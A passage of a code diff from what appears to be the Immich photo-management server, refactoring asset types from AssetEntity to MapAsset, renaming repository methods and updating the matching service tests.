-    let albums: AlbumEntity[];
+    let albums: MapAlbumDto[];
     if (assetId) {
       albums = await this.albumRepository.getByAssetId(ownerId, assetId);
     } else if (shared === true) {
@@ -8,10 +8,11 @@ import { Stats } from 'node:fs';
 import { AssetFile } from 'src/database';
 import { AssetMediaStatus, AssetRejectReason, AssetUploadAction } from 'src/dtos/asset-media-response.dto';
 import { AssetMediaCreateDto, AssetMediaReplaceDto, AssetMediaSize, UploadFieldName } from 'src/dtos/asset-media.dto';
-import { ASSET_CHECKSUM_CONSTRAINT, AssetEntity } from 'src/entities/asset.entity';
+import { MapAsset } from 'src/dtos/asset-response.dto';
 import { AssetFileType, AssetStatus, AssetType, CacheControl, JobName } from 'src/enum';
 import { AuthRequest } from 'src/middleware/auth.guard';
 import { AssetMediaService } from 'src/services/asset-media.service';
+import { ASSET_CHECKSUM_CONSTRAINT } from 'src/utils/database';
 import { ImmichFileResponse } from 'src/utils/file';
 import { assetStub } from 'test/fixtures/asset.stub';
 import { authStub } from 'test/fixtures/auth.stub';
@@ -173,7 +174,7 @@ const assetEntity = Object.freeze({
   },
   livePhotoVideoId: null,
   sidecarPath: null,
-}) as AssetEntity;
+} as MapAsset);
 
 const existingAsset = Object.freeze({
   ...assetEntity,
@@ -182,18 +183,18 @@ const existingAsset = Object.freeze({
   checksum: Buffer.from('_getExistingAsset', 'utf8'),
   libraryId: 'libraryId',
   originalFileName: 'existing-filename.jpeg',
-}) as AssetEntity;
+}) as MapAsset;
 
 const sidecarAsset = Object.freeze({
   ...existingAsset,
   sidecarPath: 'sidecar-path',
   checksum: Buffer.from('_getExistingAssetWithSideCar', 'utf8'),
-}) as AssetEntity;
+}) as MapAsset;
 
 const copiedAsset = Object.freeze({
   id: 'copied-asset',
   originalPath: 'copied-path',
-}) as AssetEntity;
+}) as MapAsset;
 
 describe(AssetMediaService.name, () => {
   let sut: AssetMediaService;
@@ -819,8 +820,8 @@ describe(AssetMediaService.name, () => {
       const file2 = Buffer.from('53be335e99f18a66ff12e9a901c7a6171dd76573', 'hex');
 
       mocks.asset.getByChecksums.mockResolvedValue([
-        { id: 'asset-1', checksum: file1 } as AssetEntity,
-        { id: 'asset-2', checksum: file2 } as AssetEntity,
+        { id: 'asset-1', checksum: file1, deletedAt: null },
+        { id: 'asset-2', checksum: file2, deletedAt: null },
       ]);
 
       await expect(
@@ -856,7 +857,7 @@ describe(AssetMediaService.name, () => {
      const file1 = Buffer.from('d2947b871a706081be194569951b7db246907957', 'hex');
       const file2 = Buffer.from('53be335e99f18a66ff12e9a901c7a6171dd76573', 'hex');
 
-      mocks.asset.getByChecksums.mockResolvedValue([{ id: 'asset-1', checksum: file1 } as AssetEntity]);
+      mocks.asset.getByChecksums.mockResolvedValue([{ id: 'asset-1', checksum: file1, deletedAt: null }]);
 
       await expect(
         sut.bulkUploadCheck(authStub.admin, {
@@ -2,6 +2,7 @@ import { BadRequestException, Injectable, InternalServerErrorException, NotFound
 import { extname } from 'node:path';
 import sanitize from 'sanitize-filename';
 import { StorageCore } from 'src/cores/storage.core';
+import { Asset } from 'src/database';
 import {
   AssetBulkUploadCheckResponseDto,
   AssetMediaResponseDto,
@@ -20,13 +21,13 @@ import {
   UploadFieldName,
 } from 'src/dtos/asset-media.dto';
 import { AuthDto } from 'src/dtos/auth.dto';
-import { ASSET_CHECKSUM_CONSTRAINT, AssetEntity } from 'src/entities/asset.entity';
 import { AssetStatus, AssetType, CacheControl, JobName, Permission, StorageFolder } from 'src/enum';
 import { AuthRequest } from 'src/middleware/auth.guard';
 import { BaseService } from 'src/services/base.service';
 import { UploadFile } from 'src/types';
 import { requireUploadAccess } from 'src/utils/access';
 import { asRequest, getAssetFiles, onBeforeLink } from 'src/utils/asset.util';
+import { ASSET_CHECKSUM_CONSTRAINT } from 'src/utils/database';
 import { getFilenameExtension, getFileNameWithoutExtension, ImmichFileResponse } from 'src/utils/file';
 import { mimeTypes } from 'src/utils/mime-types';
 import { fromChecksum } from 'src/utils/request';
@@ -212,7 +213,7 @@ export class AssetMediaService extends BaseService {
     const asset = await this.findOrFail(id);
     const size = dto.size ?? AssetMediaSize.THUMBNAIL;
 
-    const { thumbnailFile, previewFile, fullsizeFile } = getAssetFiles(asset.files);
+    const { thumbnailFile, previewFile, fullsizeFile } = getAssetFiles(asset.files ?? []);
     let filepath = previewFile?.path;
     if (size === AssetMediaSize.THUMBNAIL && thumbnailFile) {
       filepath = thumbnailFile.path;
@@ -375,7 +376,7 @@ export class AssetMediaService extends BaseService {
    * Uses only vital properties excluding things like: stacks, faces, smart search info, etc,
    * and then queues a METADATA_EXTRACTION job.
    */
-  private async createCopy(asset: AssetEntity): Promise<AssetEntity> {
+  private async createCopy(asset: Omit<Asset, 'id'>) {
     const created = await this.assetRepository.create({
       ownerId: asset.ownerId,
       originalPath: asset.originalPath,
@@ -398,12 +399,7 @@ export class AssetMediaService extends BaseService {
     return created;
   }
 
-  private async create(
-    ownerId: string,
-    dto: AssetMediaCreateDto,
-    file: UploadFile,
-    sidecarFile?: UploadFile,
-  ): Promise<AssetEntity> {
+  private async create(ownerId: string, dto: AssetMediaCreateDto, file: UploadFile, sidecarFile?: UploadFile) {
     const asset = await this.assetRepository.create({
       ownerId,
       libraryId: null,
@@ -444,7 +440,7 @@ export class AssetMediaService extends BaseService {
     }
   }
 
-  private async findOrFail(id: string): Promise<AssetEntity> {
+  private async findOrFail(id: string) {
     const asset = await this.assetRepository.getById(id, { files: true });
     if (!asset) {
       throw new NotFoundException('Asset not found');
@@ -1,8 +1,7 @@
 import { BadRequestException } from '@nestjs/common';
 import { DateTime } from 'luxon';
-import { mapAsset } from 'src/dtos/asset-response.dto';
+import { MapAsset, mapAsset } from 'src/dtos/asset-response.dto';
 import { AssetJobName, AssetStatsResponseDto } from 'src/dtos/asset.dto';
-import { AssetEntity } from 'src/entities/asset.entity';
 import { AssetStatus, AssetType, JobName, JobStatus } from 'src/enum';
 import { AssetStats } from 'src/repositories/asset.repository';
 import { AssetService } from 'src/services/asset.service';
@@ -35,7 +34,7 @@ describe(AssetService.name, () => {
     expect(sut).toBeDefined();
   });
 
-  const mockGetById = (assets: AssetEntity[]) => {
+  const mockGetById = (assets: MapAsset[]) => {
     mocks.asset.getById.mockImplementation((assetId) => Promise.resolve(assets.find((asset) => asset.id === assetId)));
   };
 
@@ -608,7 +607,7 @@ describe(AssetService.name, () => {
       mocks.asset.getById.mockResolvedValue({
         ...assetStub.primaryImage,
         stack: { ...assetStub.primaryImage.stack, assets: assetStub.primaryImage.stack!.assets.slice(0, 2) },
-      } as AssetEntity);
+      });
 
       await sut.handleAssetDeletion({ id: assetStub.primaryImage.id, deleteOnDisk: true });
 
@@ -5,6 +5,7 @@ import { JOBS_ASSET_PAGINATION_SIZE } from 'src/constants';
 import { OnJob } from 'src/decorators';
 import {
   AssetResponseDto,
+  MapAsset,
   MemoryLaneResponseDto,
   SanitizedAssetResponseDto,
   mapAsset,
@@ -20,7 +21,6 @@ import {
 } from 'src/dtos/asset.dto';
 import { AuthDto } from 'src/dtos/auth.dto';
 import { MemoryLaneDto } from 'src/dtos/search.dto';
-import { AssetEntity } from 'src/entities/asset.entity';
 import { AssetStatus, JobName, JobStatus, Permission, QueueName } from 'src/enum';
 import { BaseService } from 'src/services/base.service';
 import { ISidecarWriteJob, JobItem, JobOf } from 'src/types';
@@ -43,7 +43,7 @@ export class AssetService extends BaseService {
         yearsAgo,
         // TODO move this to clients
         title: `${yearsAgo} year${yearsAgo > 1 ? 's' : ''} ago`,
-        assets: assets.map((asset) => mapAsset(asset as unknown as AssetEntity, { auth })),
+        assets: assets.map((asset) => mapAsset(asset, { auth })),
       };
     });
   }
@@ -105,7 +105,7 @@ export class AssetService extends BaseService {
     const { description, dateTimeOriginal, latitude, longitude, rating, ...rest } = dto;
     const repos = { asset: this.assetRepository, event: this.eventRepository };
 
-    let previousMotion: AssetEntity | null = null;
+    let previousMotion: MapAsset | null = null;
     if (rest.livePhotoVideoId) {
       await onBeforeLink(repos, { userId: auth.user.id, livePhotoVideoId: rest.livePhotoVideoId });
     } else if (rest.livePhotoVideoId === null) {
@@ -233,7 +233,7 @@ export class AssetService extends BaseService {
       }
     }
 
-    const { fullsizeFile, previewFile, thumbnailFile } = getAssetFiles(asset.files);
+    const { fullsizeFile, previewFile, thumbnailFile } = getAssetFiles(asset.files ?? []);
     const files = [thumbnailFile?.path, previewFile?.path, fullsizeFile?.path, asset.encodedVideoPath];
 
     if (deleteOnDisk) {
|
@ -68,7 +68,7 @@ export class DuplicateService extends BaseService {
|
|||||||
return JobStatus.SKIPPED;
|
return JobStatus.SKIPPED;
|
||||||
}
|
}
|
||||||
|
|
||||||
const previewFile = getAssetFile(asset.files, AssetFileType.PREVIEW);
|
const previewFile = getAssetFile(asset.files || [], AssetFileType.PREVIEW);
|
||||||
if (!previewFile) {
|
if (!previewFile) {
|
||||||
this.logger.warn(`Asset ${id} is missing preview image`);
|
this.logger.warn(`Asset ${id} is missing preview image`);
|
||||||
return JobStatus.FAILED;
|
return JobStatus.FAILED;
|
||||||
|
@ -285,9 +285,9 @@ describe(JobService.name, () => {
|
|||||||
it(`should queue ${jobs.length} jobs when a ${item.name} job finishes successfully`, async () => {
|
it(`should queue ${jobs.length} jobs when a ${item.name} job finishes successfully`, async () => {
|
||||||
if (item.name === JobName.GENERATE_THUMBNAILS && item.data.source === 'upload') {
|
if (item.name === JobName.GENERATE_THUMBNAILS && item.data.source === 'upload') {
|
||||||
if (item.data.id === 'asset-live-image') {
|
if (item.data.id === 'asset-live-image') {
|
||||||
mocks.asset.getByIdsWithAllRelations.mockResolvedValue([assetStub.livePhotoStillAsset]);
|
mocks.asset.getByIdsWithAllRelationsButStacks.mockResolvedValue([assetStub.livePhotoStillAsset as any]);
|
||||||
} else {
|
} else {
|
||||||
mocks.asset.getByIdsWithAllRelations.mockResolvedValue([assetStub.livePhotoMotionAsset]);
|
mocks.asset.getByIdsWithAllRelationsButStacks.mockResolvedValue([assetStub.livePhotoMotionAsset as any]);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@@ -254,7 +254,7 @@ export class JobService extends BaseService {
 
       case JobName.METADATA_EXTRACTION: {
        if (item.data.source === 'sidecar-write') {
-          const [asset] = await this.assetRepository.getByIdsWithAllRelations([item.data.id]);
+          const [asset] = await this.assetRepository.getByIdsWithAllRelationsButStacks([item.data.id]);
           if (asset) {
             this.eventRepository.clientSend('on_asset_update', asset.ownerId, mapAsset(asset));
           }
@@ -284,7 +284,7 @@ export class JobService extends BaseService {
           break;
         }
 
-        const [asset] = await this.assetRepository.getByIdsWithAllRelations([item.data.id]);
+        const [asset] = await this.assetRepository.getByIdsWithAllRelationsButStacks([item.data.id]);
         if (!asset) {
           this.logger.warn(`Could not find asset ${item.data.id} after generating thumbnails`);
           break;
|
@ -350,7 +350,7 @@ describe(LibraryService.name, () => {
|
|||||||
progressCounter: 0,
|
progressCounter: 0,
|
||||||
};
|
};
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.external]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.external]);
|
||||||
mocks.storage.stat.mockRejectedValue(new Error('ENOENT, no such file or directory'));
|
mocks.storage.stat.mockRejectedValue(new Error('ENOENT, no such file or directory'));
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
@ -371,7 +371,7 @@ describe(LibraryService.name, () => {
|
|||||||
progressCounter: 0,
|
progressCounter: 0,
|
||||||
};
|
};
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.external]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.external]);
|
||||||
mocks.storage.stat.mockRejectedValue(new Error('Could not read file'));
|
mocks.storage.stat.mockRejectedValue(new Error('Could not read file'));
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
@ -392,7 +392,7 @@ describe(LibraryService.name, () => {
|
|||||||
progressCounter: 0,
|
progressCounter: 0,
|
||||||
};
|
};
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.trashedOffline]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.trashedOffline]);
|
||||||
mocks.storage.stat.mockRejectedValue(new Error('Could not read file'));
|
mocks.storage.stat.mockRejectedValue(new Error('Could not read file'));
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
@ -410,7 +410,7 @@ describe(LibraryService.name, () => {
|
|||||||
progressCounter: 0,
|
progressCounter: 0,
|
||||||
};
|
};
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.trashedOffline]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.trashedOffline]);
|
||||||
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.external.fileModifiedAt } as Stats);
|
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.external.fileModifiedAt } as Stats);
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
@ -431,7 +431,7 @@ describe(LibraryService.name, () => {
|
|||||||
progressCounter: 0,
|
progressCounter: 0,
|
||||||
};
|
};
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.trashedOffline]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.trashedOffline]);
|
||||||
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.external.fileModifiedAt } as Stats);
|
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.external.fileModifiedAt } as Stats);
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
@ -451,7 +451,7 @@ describe(LibraryService.name, () => {
|
|||||||
progressCounter: 0,
|
progressCounter: 0,
|
||||||
};
|
};
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.trashedOffline]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.trashedOffline]);
|
||||||
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.external.fileModifiedAt } as Stats);
|
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.external.fileModifiedAt } as Stats);
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
@ -471,7 +471,7 @@ describe(LibraryService.name, () => {
|
|||||||
progressCounter: 0,
|
progressCounter: 0,
|
||||||
};
|
};
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.external]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.external]);
|
||||||
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.external.fileModifiedAt } as Stats);
|
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.external.fileModifiedAt } as Stats);
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
@ -489,7 +489,7 @@ describe(LibraryService.name, () => {
|
|||||||
progressCounter: 0,
|
progressCounter: 0,
|
||||||
};
|
};
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.trashedOffline]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.trashedOffline]);
|
||||||
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.trashedOffline.fileModifiedAt } as Stats);
|
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.trashedOffline.fileModifiedAt } as Stats);
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
@ -518,7 +518,7 @@ describe(LibraryService.name, () => {
|
|||||||
|
|
||||||
const mtime = new Date(assetStub.external.fileModifiedAt.getDate() + 1);
|
const mtime = new Date(assetStub.external.fileModifiedAt.getDate() + 1);
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.external]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.external]);
|
||||||
mocks.storage.stat.mockResolvedValue({ mtime } as Stats);
|
mocks.storage.stat.mockResolvedValue({ mtime } as Stats);
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
|
@@ -18,7 +18,6 @@ import {
   ValidateLibraryImportPathResponseDto,
   ValidateLibraryResponseDto,
 } from 'src/dtos/library.dto';
-import { AssetEntity } from 'src/entities/asset.entity';
 import { AssetStatus, AssetType, DatabaseLock, ImmichWorker, JobName, JobStatus, QueueName } from 'src/enum';
 import { ArgOf } from 'src/repositories/event.repository';
 import { AssetSyncResult } from 'src/repositories/library.repository';
@@ -467,7 +466,7 @@ export class LibraryService extends BaseService {
 
   @OnJob({ name: JobName.LIBRARY_SYNC_ASSETS, queue: QueueName.LIBRARY })
   async handleSyncAssets(job: JobOf<JobName.LIBRARY_SYNC_ASSETS>): Promise<JobStatus> {
-    const assets = await this.assetRepository.getByIds(job.assetIds);
+    const assets = await this.assetJobRepository.getForSyncAssets(job.assetIds);
 
     const assetIdsToOffline: string[] = [];
     const trashedAssetIdsToOffline: string[] = [];
@@ -561,7 +560,16 @@ export class LibraryService extends BaseService {
     return JobStatus.SUCCESS;
   }
 
-  private checkExistingAsset(asset: AssetEntity, stat: Stats | null): AssetSyncResult {
+  private checkExistingAsset(
+    asset: {
+      isOffline: boolean;
+      libraryId: string | null;
+      originalPath: string;
+      status: AssetStatus;
+      fileModifiedAt: Date;
+    },
+    stat: Stats | null,
+  ): AssetSyncResult {
     if (!stat) {
       // File not found on disk or permission error
       if (asset.isOffline) {
|
@ -15,6 +15,14 @@ describe(MemoryService.name, () => {
|
|||||||
expect(sut).toBeDefined();
|
expect(sut).toBeDefined();
|
||||||
});
|
});
|
||||||
|
|
||||||
|
describe('onMemoryCleanup', () => {
|
||||||
|
it('should clean up memories', async () => {
|
||||||
|
mocks.memory.cleanup.mockResolvedValue([]);
|
||||||
|
await sut.onMemoriesCleanup();
|
||||||
|
expect(mocks.memory.cleanup).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
describe('search', () => {
|
describe('search', () => {
|
||||||
it('should search memories', async () => {
|
it('should search memories', async () => {
|
||||||
const [userId] = newUuids();
|
const [userId] = newUuids();
|
||||||
|
@ -3,7 +3,7 @@ import { randomBytes } from 'node:crypto';
|
|||||||
import { Stats } from 'node:fs';
|
import { Stats } from 'node:fs';
|
||||||
import { constants } from 'node:fs/promises';
|
import { constants } from 'node:fs/promises';
|
||||||
import { defaults } from 'src/config';
|
import { defaults } from 'src/config';
|
||||||
import { AssetEntity } from 'src/entities/asset.entity';
|
import { MapAsset } from 'src/dtos/asset-response.dto';
|
||||||
import { AssetType, ExifOrientation, ImmichWorker, JobName, JobStatus, SourceType } from 'src/enum';
|
import { AssetType, ExifOrientation, ImmichWorker, JobName, JobStatus, SourceType } from 'src/enum';
|
||||||
import { WithoutProperty } from 'src/repositories/asset.repository';
|
import { WithoutProperty } from 'src/repositories/asset.repository';
|
||||||
import { ImmichTags } from 'src/repositories/metadata.repository';
|
import { ImmichTags } from 'src/repositories/metadata.repository';
|
||||||
@ -549,7 +549,6 @@ describe(MetadataService.name, () => {
|
|||||||
livePhotoVideoId: null,
|
livePhotoVideoId: null,
|
||||||
libraryId: null,
|
libraryId: null,
|
||||||
});
|
});
|
||||||
mocks.asset.getByIds.mockResolvedValue([{ ...assetStub.livePhotoWithOriginalFileName, livePhotoVideoId: null }]);
|
|
||||||
mocks.storage.stat.mockResolvedValue({
|
mocks.storage.stat.mockResolvedValue({
|
||||||
size: 123_456,
|
size: 123_456,
|
||||||
mtime: assetStub.livePhotoWithOriginalFileName.fileModifiedAt,
|
mtime: assetStub.livePhotoWithOriginalFileName.fileModifiedAt,
|
||||||
@ -719,7 +718,7 @@ describe(MetadataService.name, () => {
|
|||||||
});
|
});
|
||||||
mocks.crypto.hashSha1.mockReturnValue(randomBytes(512));
|
mocks.crypto.hashSha1.mockReturnValue(randomBytes(512));
|
||||||
mocks.asset.create.mockImplementation(
|
mocks.asset.create.mockImplementation(
|
||||||
(asset) => Promise.resolve({ ...assetStub.livePhotoMotionAsset, ...asset }) as Promise<AssetEntity>,
|
(asset) => Promise.resolve({ ...assetStub.livePhotoMotionAsset, ...asset }) as Promise<MapAsset>,
|
||||||
);
|
);
|
||||||
const video = randomBytes(512);
|
const video = randomBytes(512);
|
||||||
mocks.storage.readFile.mockResolvedValue(video);
|
mocks.storage.readFile.mockResolvedValue(video);
|
||||||
@ -1394,7 +1393,7 @@ describe(MetadataService.name, () => {
|
|||||||
});
|
});
|
||||||
|
|
||||||
it('should set sidecar path if exists (sidecar named photo.xmp)', async () => {
|
it('should set sidecar path if exists (sidecar named photo.xmp)', async () => {
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.sidecarWithoutExt]);
|
mocks.asset.getByIds.mockResolvedValue([assetStub.sidecarWithoutExt as any]);
|
||||||
mocks.storage.checkFileExists.mockResolvedValueOnce(false);
|
mocks.storage.checkFileExists.mockResolvedValueOnce(false);
|
||||||
mocks.storage.checkFileExists.mockResolvedValueOnce(true);
|
mocks.storage.checkFileExists.mockResolvedValueOnce(true);
|
||||||
|
|
||||||
@ -1446,7 +1445,7 @@ describe(MetadataService.name, () => {
|
|||||||
|
|
||||||
describe('handleSidecarDiscovery', () => {
|
describe('handleSidecarDiscovery', () => {
|
||||||
it('should skip hidden assets', async () => {
|
it('should skip hidden assets', async () => {
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.livePhotoMotionAsset]);
|
mocks.asset.getByIds.mockResolvedValue([assetStub.livePhotoMotionAsset as any]);
|
||||||
await sut.handleSidecarDiscovery({ id: assetStub.livePhotoMotionAsset.id });
|
await sut.handleSidecarDiscovery({ id: assetStub.livePhotoMotionAsset.id });
|
||||||
expect(mocks.storage.checkFileExists).not.toHaveBeenCalled();
|
expect(mocks.storage.checkFileExists).not.toHaveBeenCalled();
|
||||||
});
|
});
|
||||||
|
@@ -271,7 +271,7 @@ export class MetadataService extends BaseService {
     ];
 
     if (this.isMotionPhoto(asset, exifTags)) {
-      promises.push(this.applyMotionPhotos(asset as unknown as Asset, exifTags, dates, stats));
+      promises.push(this.applyMotionPhotos(asset, exifTags, dates, stats));
     }
 
     if (isFaceImportEnabled(metadata) && this.hasTaggedFaces(exifTags)) {
@@ -2,7 +2,8 @@ import { BadRequestException, Injectable, NotFoundException } from '@nestjs/comm
 import { Insertable, Updateable } from 'kysely';
 import { FACE_THUMBNAIL_SIZE, JOBS_ASSET_PAGINATION_SIZE } from 'src/constants';
 import { StorageCore } from 'src/cores/storage.core';
-import { AssetFaces, FaceSearch, Person } from 'src/db';
+import { Person } from 'src/database';
+import { AssetFaces, FaceSearch } from 'src/db';
 import { Chunked, OnJob } from 'src/decorators';
 import { BulkIdErrorReason, BulkIdResponseDto } from 'src/dtos/asset-ids.response.dto';
 import { AuthDto } from 'src/dtos/auth.dto';
@@ -315,6 +316,7 @@ export class PersonService extends BaseService {
     const facesToAdd: (Insertable<AssetFaces> & { id: string })[] = [];
     const embeddings: FaceSearch[] = [];
     const mlFaceIds = new Set<string>();
+
     for (const face of asset.faces) {
       if (face.sourceType === SourceType.MACHINE_LEARNING) {
         mlFaceIds.add(face.id);
@@ -477,7 +479,7 @@ export class PersonService extends BaseService {
       embedding: face.faceSearch.embedding,
       maxDistance: machineLearning.facialRecognition.maxDistance,
       numResults: machineLearning.facialRecognition.minFaces,
-      minBirthDate: face.asset.fileCreatedAt,
+      minBirthDate: face.asset.fileCreatedAt ?? undefined,
     });
 
     // `matches` also includes the face itself
@@ -503,7 +505,7 @@ export class PersonService extends BaseService {
       maxDistance: machineLearning.facialRecognition.maxDistance,
       numResults: 1,
       hasPerson: true,
-      minBirthDate: face.asset.fileCreatedAt,
+      minBirthDate: face.asset.fileCreatedAt ?? undefined,
     });
 
     if (matchWithPerson.length > 0) {
@@ -39,13 +39,36 @@ describe(SearchService.name, () => {
     });
   });
 
+  describe('searchPlaces', () => {
+    it('should search places', async () => {
+      mocks.search.searchPlaces.mockResolvedValue([
+        {
+          id: 42,
+          name: 'my place',
+          latitude: 420,
+          longitude: 69,
+          admin1Code: null,
+          admin1Name: null,
+          admin2Code: null,
+          admin2Name: null,
+          alternateNames: null,
+          countryCode: 'US',
+          modificationDate: new Date(),
+        },
+      ]);
+
+      await sut.searchPlaces({ name: 'place' });
+      expect(mocks.search.searchPlaces).toHaveBeenCalledWith('place');
+    });
+  });
+
   describe('getExploreData', () => {
     it('should get assets by city and tag', async () => {
       mocks.asset.getAssetIdByCity.mockResolvedValue({
         fieldName: 'exifInfo.city',
         items: [{ value: 'test-city', data: assetStub.withLocation.id }],
       });
-      mocks.asset.getByIdsWithAllRelations.mockResolvedValue([assetStub.withLocation]);
+      mocks.asset.getByIdsWithAllRelationsButStacks.mockResolvedValue([assetStub.withLocation]);
       const expectedResponse = [
         { fieldName: 'exifInfo.city', items: [{ value: 'test-city', data: mapAsset(assetStub.withLocation) }] },
       ];
@@ -1,5 +1,5 @@
 import { BadRequestException, Injectable } from '@nestjs/common';
-import { AssetMapOptions, AssetResponseDto, mapAsset } from 'src/dtos/asset-response.dto';
+import { AssetMapOptions, AssetResponseDto, MapAsset, mapAsset } from 'src/dtos/asset-response.dto';
 import { AuthDto } from 'src/dtos/auth.dto';
 import { mapPerson, PersonResponseDto } from 'src/dtos/person.dto';
 import {
@@ -14,7 +14,6 @@ import {
   SearchSuggestionType,
   SmartSearchDto,
 } from 'src/dtos/search.dto';
-import { AssetEntity } from 'src/entities/asset.entity';
 import { AssetOrder } from 'src/enum';
 import { SearchExploreItem } from 'src/repositories/search.repository';
 import { BaseService } from 'src/services/base.service';
@@ -36,7 +35,7 @@ export class SearchService extends BaseService {
   async getExploreData(auth: AuthDto): Promise<SearchExploreItem<AssetResponseDto>[]> {
     const options = { maxFields: 12, minAssetsPerField: 5 };
     const cities = await this.assetRepository.getAssetIdByCity(auth.user.id, options);
-    const assets = await this.assetRepository.getByIdsWithAllRelations(cities.items.map(({ data }) => data));
+    const assets = await this.assetRepository.getByIdsWithAllRelationsButStacks(cities.items.map(({ data }) => data));
     const items = assets.map((asset) => ({ value: asset.exifInfo!.city!, data: mapAsset(asset, { auth }) }));
     return [{ fieldName: cities.fieldName, items }];
   }
@@ -139,7 +138,7 @@ export class SearchService extends BaseService {
     return [auth.user.id, ...partnerIds];
   }
 
-  private mapResponse(assets: AssetEntity[], nextPage: string | null, options: AssetMapOptions): SearchResponseDto {
+  private mapResponse(assets: MapAsset[], nextPage: string | null, options: AssetMapOptions): SearchResponseDto {
     return {
       albums: { total: 0, count: 0, items: [], facets: [] },
       assets: {
@@ -244,7 +244,7 @@ describe(SharedLinkService.name, () => {
       await sut.remove(authStub.user1, sharedLinkStub.valid.id);
 
       expect(mocks.sharedLink.get).toHaveBeenCalledWith(authStub.user1.user.id, sharedLinkStub.valid.id);
-      expect(mocks.sharedLink.remove).toHaveBeenCalledWith(sharedLinkStub.valid);
+      expect(mocks.sharedLink.remove).toHaveBeenCalledWith(sharedLinkStub.valid.id);
     });
   });
 
@@ -333,8 +333,7 @@ describe(SharedLinkService.name, () => {
     });
 
     it('should return metadata tags with a default image path if the asset id is not set', async () => {
-      mocks.sharedLink.get.mockResolvedValue({ ...sharedLinkStub.individual, album: undefined, assets: [] });
-
+      mocks.sharedLink.get.mockResolvedValue({ ...sharedLinkStub.individual, album: null, assets: [] });
       await expect(sut.getMetadataTags(authStub.adminSharedLink)).resolves.toEqual({
         description: '0 shared photos & videos',
         imageUrl: `https://my.immich.app/feature-panel.png`,
@ -1,4 +1,5 @@
|
|||||||
import { BadRequestException, ForbiddenException, Injectable, UnauthorizedException } from '@nestjs/common';
|
import { BadRequestException, ForbiddenException, Injectable, UnauthorizedException } from '@nestjs/common';
|
||||||
|
import { SharedLink } from 'src/database';
|
||||||
import { AssetIdErrorReason, AssetIdsResponseDto } from 'src/dtos/asset-ids.response.dto';
|
import { AssetIdErrorReason, AssetIdsResponseDto } from 'src/dtos/asset-ids.response.dto';
|
||||||
import { AssetIdsDto } from 'src/dtos/asset.dto';
|
import { AssetIdsDto } from 'src/dtos/asset.dto';
|
||||||
import { AuthDto } from 'src/dtos/auth.dto';
|
import { AuthDto } from 'src/dtos/auth.dto';
|
||||||
@ -11,7 +12,6 @@ import {
|
|||||||
SharedLinkResponseDto,
|
SharedLinkResponseDto,
|
||||||
SharedLinkSearchDto,
|
